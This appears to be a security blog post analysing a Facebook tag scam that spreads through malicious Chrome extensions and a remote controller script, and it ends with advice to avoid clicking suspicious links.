Two weeks ago, we wrote about the re-emergence of tag scams on Facebook. What seemed to be a basic worm at that time turned into inspiration for multiple cyber-criminal gangs. This week-end hackers took a more diversified approach to reaching victims’ browsers and wreaking havoc on Facebook walls.
Today’s scam is much more complex than what we described in the previous post. It all starts with an inciting image disguised as video posted on a user’s wall. Again, the scam message also features up until 20 friends tagged to it, which facilitates its spreading.
If the user is curious enough to click the link, they are taken to an external page via an anonymized service. The destination page is a Facebook clone that shows an alleged Youtube Video.
However, Windows or Mac OS X users running Chrome are prompted to download a malicious browser extension snuck into the official Google Chrome Store.
As of the time of writing this, more than 4,200 users had installed it. There are three extensions that we know of (one of them is called Koksty and specifically targets the Russian social network vKontakte). All of these Chrome extensions are still online. We have reported them to Google for takedown.
The addons themselves are the ones propagating the scam to victims. Since they reside in the browser, these extensions can perform any actions on behalf of the user, such as reading and modifying the data on the websites the user accesses.
Encrypted controller code that loads the Facebook share payload
When decrypted, the code points to another website controlled by the attacker; the sssssefv.js file loaded from this website is the controller page for this scam wave.
Oddly enough, the Facebook payload features multiple code comments such as “kur ti bon do foto tjera e kthen qysh ke , se qetash spo tbojn fotot”, which might hint that the hacker group responsible for this is of Albanian origin.
This controller script handles everything: it creates the anonymized links, fetches inciting photos to be used as bait for the Facebook post, creates short URLs for every new Facebook post and so much more. It’s a fully automated Facebook scam infrastructure.
So now you know how it all happens. Remember, don’t click anything that looks fishy, regardless of how shocking or inciting it appears to be. Hackers count on your curiosity to make you part of the scam. Stay safe!